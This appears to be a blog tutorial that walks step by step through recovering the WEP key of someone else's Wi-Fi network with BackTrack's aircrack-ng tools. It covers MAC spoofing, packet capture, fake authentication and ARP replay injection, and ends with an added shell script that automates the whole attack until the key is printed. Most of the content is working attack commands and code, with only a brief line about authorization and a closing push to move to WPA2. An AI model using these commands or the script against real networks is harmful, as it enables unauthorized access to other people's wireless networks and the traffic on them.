Cracking a wireless network protected with WEP is very easy, as described in How to Protect Your Wireless Network, and takes around 5 minutes. Here you will find step-by-step instructions for recovering the WEP key of a wireless network with the aircrack-ng suite that ships with BackTrack.
Before you begin
- You need to have BackTrack installed and running on VMWare Player. How to Install VMWare & Backtrack 4
- Check if your wireless adapter is compatible with Backtrack 4 from List of compatible adapters
- I am using the Alfa AWUS036H which is a very well known usb wireless adapter because of its good performance and cheap price.
- Make sure that your wireless adapter is attached to your virtual machine. In VMWare go to the menu “Virtual Machine” -> “Removable Devices” and make sure YOUR ADAPTER IS TICKED.
Start Cracking the WEP Password
Launch the Konsole, which is BackTrack’s built-in command line. It can be found in the lower left corner of the taskbar, as shown in the image below.
Run the interface-listing command shown in the image below to get a list of your network interfaces:
You may get something like “ath1”, “wlan0”, “wifi0”, or “ra0”. This is called your interface and you need to substitute it everywhere you see (interface) in the coming commands.
In my case: (interface)=wlan0 (see image below)
Now run the following commands to take the adapter out of monitor mode, change its MAC address with macchanger, and put it back into monitor mode:
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)
In my case
airmon-ng stop wlan0
ifconfig wlan0 down
macchanger --mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan0
Don’t forget to replace (interface) with its value. Your MAC address is now changed to the fake address 00:11:22:33:44:55, which is the address the injection commands below must be told to use. Note that on some drivers airmon-ng enables monitor mode on a separate interface and prints “monitor mode enabled on mon0” (or similar); if it does, use that name as (interface) in all of the commands that follow.
Now it is time to view the list of available networks and pick one for cracking. Run airodump-ng on your interface:
airodump-ng (interface)
In my case
airodump-ng wlan0
Wait for some time for all the networks to load, then press Ctrl+C to stop the updates. Now choose the wireless network that you wish to crack; it must show “WEP” in the “ENC” column. “OPN” means that the network is open and you can connect to it without a key. WPA and WPA2 networks will not work here, because the attack relies on WEP’s weak RC4 initialization vectors, which WPA and WPA2 do not share; see How to Crack WPA & WPA2 Wireless with BackTrack 4 running on Windows if you wish to crack a WPA or WPA2 wireless network.
After selecting the network that you want to crack, take note of its BSSID, channel (CH), and ESSID values. In my case: (bssid)=00:1F:9F:4B:B3:DF, (channel)=1, and (essid)=barQ
Now we are going to capture the data passing through that network and record it to a file. Run:
airodump-ng -c (channel) -w (filename) --bssid (bssid) (interface)
In my case
airodump-ng -c 1 -w barQ --bssid 00:1F:9F:4B:B3:DF wlan0
Replace (channel), (bssid), and (interface) with the values noted before. (filename) can be any name; I usually use the name of the network, which is “barQ” in this case. Locking airodump-ng to one channel and one BSSID matters: the adapter cannot hop channels and still capture every packet from the target.
The data is now being collected and recorded and you should get an output similar to the window in the background shown in the picture below. Leave that window running.
We now need to generate traffic on that network so that airodump-ng captures unique initialization vectors (IVs) faster; on a quiet network this is what turns a multi-hour wait into a few minutes. Launch a second Konsole window and run a fake authentication against the access point:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
In my case
aireplay-ng -1 0 -a 00:1F:9F:4B:B3:DF -h 00:11:22:33:44:55 -e barQ wlan0
The -1 0 option performs a fake authentication with no re-association delay, using the fake MAC address set earlier. You should get the message “Association successful :-)”, which means the access point accepts frames from your MAC address and you are ready to generate traffic on that network. If the association fails repeatedly, the access point may be filtering by MAC address or you may be too far from it. Now start the ARP request replay attack:
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
In my case
aireplay-ng -3 -b 00:1F:9F:4B:B3:DF -h 00:11:22:33:44:55 wlan0
Now it is time to WAIT. aireplay-ng listens for an ARP request from the network and re-injects it over and over; each replayed request makes the router answer with a new encrypted packet, and therefore a new IV. After a few minutes the window might start showing “Read XXXXX packets”, but the important value to watch is “#Data” in the first window, which counts the captured IVs. If “#Data” stays flat, aireplay-ng has not yet seen an ARP request to replay; it needs at least one, which usually comes from a client on the network.
Wait until “#Data” goes above 10,000, which should take less than 2 minutes once the replay is running. You might need more than 10,000 IVs depending on the key length: a 64-bit (40-bit) key usually falls with far fewer IVs than a 128-bit (104-bit) key. If aircrack-ng fails in the next step, leave the capture and replay running and try again with more data.
Displaying the Key
Once you have collected more than 10,000 Data packets, launch a third Konsole window and enter:
aircrack-ng -b (bssid) (filename)-01.cap
In my case
aircrack-ng -b 00:1F:9F:4B:B3:DF barQ-01.cap
The filename should be what you used in (filename) followed by “-01.cap”. If you are not sure about the (filename), enter “ls” to see a list of all the files in the current directory.
If you don’t have enough data, aircrack-ng will ask you to collect more data. If you do, you should see something like:
The WEP key is what you see beside “KEY FOUND!” inside the brackets; remove the colons “:” to get it in the format “XXXXXXXXXX”.
Note: the hex string is the WEP key itself, not a hash of it, and entering it in hex is enough to get you connected. aircrack-ng also shows an ASCII form beside it only when every byte of the key happens to be a printable character, as it is when the owner typed a pass phrase rather than hex digits.
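The whole procedure above, from MAC change to key recovery, as one script. This is an added example and not part of the original post or of the aircrack-ng suite. It assumes the aircrack-ng 1.x tools and macchanger are on the PATH, that it runs as root, and that you are authorized to test the target; the input checks, the parsing of airmon-ng’s “monitor mode enabled on” line and of aircrack-ng’s “KEY FOUND!” line, and the sample strings used to exercise them are all constructed for this example.

```shell
#!/bin/sh
# wep-audit.sh: wraps airmon-ng / macchanger / airodump-ng / aireplay-ng /
# aircrack-ng into one run. Added example, not the post's own tooling.
# Usage: wep-audit.sh IFACE BSSID CHANNEL ESSID CAPTURE_NAME

FAKE_MAC="00:11:22:33:44:55"

# A BSSID must be six colon-separated hex pairs; a typo here is the usual
# reason "Association successful" never appears.
valid_bssid() {
    printf '%s\n' "$1" | grep -qE '^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$'
}

# 2.4 GHz channels are 1-14; anything else is a mistake in the arguments.
valid_channel() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 14 ]
}

# Newer drivers make airmon-ng create a separate monitor interface and print
# "(monitor mode enabled on mon0)"; older ones keep the original name.
# $1 = airmon-ng start output, $2 = original interface name.
monitor_iface() {
    name=$(printf '%s\n' "$1" \
        | sed -n 's/.*monitor mode enabled on \([A-Za-z0-9]*\).*/\1/p' | head -n 1)
    if [ -n "$name" ]; then printf '%s\n' "$name"; else printf '%s\n' "$2"; fi
}

# aircrack-ng prints e.g. "KEY FOUND! [ 1A:2B:3C:4D:5E ]"; return the key
# with the colons stripped (the form typed into a client), or nothing if the
# key has not been found yet.
parse_key() {
    printf '%s\n' "$1" \
        | sed -n 's/.*KEY FOUND! *\[ *\([0-9A-Fa-f:]*\) *\].*/\1/p' \
        | tr -d ':' | head -n 1
}

run_audit() {
    iface=$1; bssid=$2; channel=$3; essid=$4; name=$5
    valid_bssid "$bssid"     || { echo "bad BSSID: $bssid" >&2; return 1; }
    valid_channel "$channel" || { echo "bad channel: $channel" >&2; return 1; }

    # Step 1: spoof the MAC and enter monitor mode, keeping whatever
    # interface name airmon-ng reports.
    airmon-ng stop "$iface" >/dev/null
    ifconfig "$iface" down
    macchanger --mac "$FAKE_MAC" "$iface"
    mon=$(monitor_iface "$(airmon-ng start "$iface")" "$iface")
    echo "capturing on $mon"

    # Step 2: capture only the target channel and BSSID, in the background.
    airodump-ng -c "$channel" -w "$name" --bssid "$bssid" "$mon" >/dev/null 2>&1 &
    dump_pid=$!
    sleep 3

    # Step 3: fake authentication, then ARP request replay to generate IVs.
    aireplay-ng -1 0 -a "$bssid" -h "$FAKE_MAC" -e "$essid" "$mon"
    aireplay-ng -3 -b "$bssid" -h "$FAKE_MAC" "$mon" >/dev/null 2>&1 &
    replay_pid=$!

    # Step 4: retry aircrack-ng (-q = quiet) against the growing capture
    # until a key appears, instead of guessing when #Data is large enough.
    key=""
    while [ -z "$key" ]; do
        sleep 30
        key=$(parse_key "$(aircrack-ng -q -b "$bssid" "$name-01.cap" 2>/dev/null)")
    done
    kill "$replay_pid" "$dump_pid" 2>/dev/null
    echo "WEP key: $key"
}

if [ $# -eq 5 ]; then
    run_audit "$@"
fi
```

Run it as `./wep-audit.sh wlan0 00:1F:9F:4B:B3:DF 1 barQ barQ`. The retry loop is the part worth keeping even if you run the tools by hand: aircrack-ng can be pointed at the capture file while airodump-ng is still writing to it, so there is no need to stop the capture to check whether enough IVs have arrived.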
We have seen how easy it is to crack a WEP wireless network. This should be the push you need to change the security of your wireless network to WPA2 if it is still using WEP.
Feel free to ask questions or let me know if I have missed something by leaving a comment below.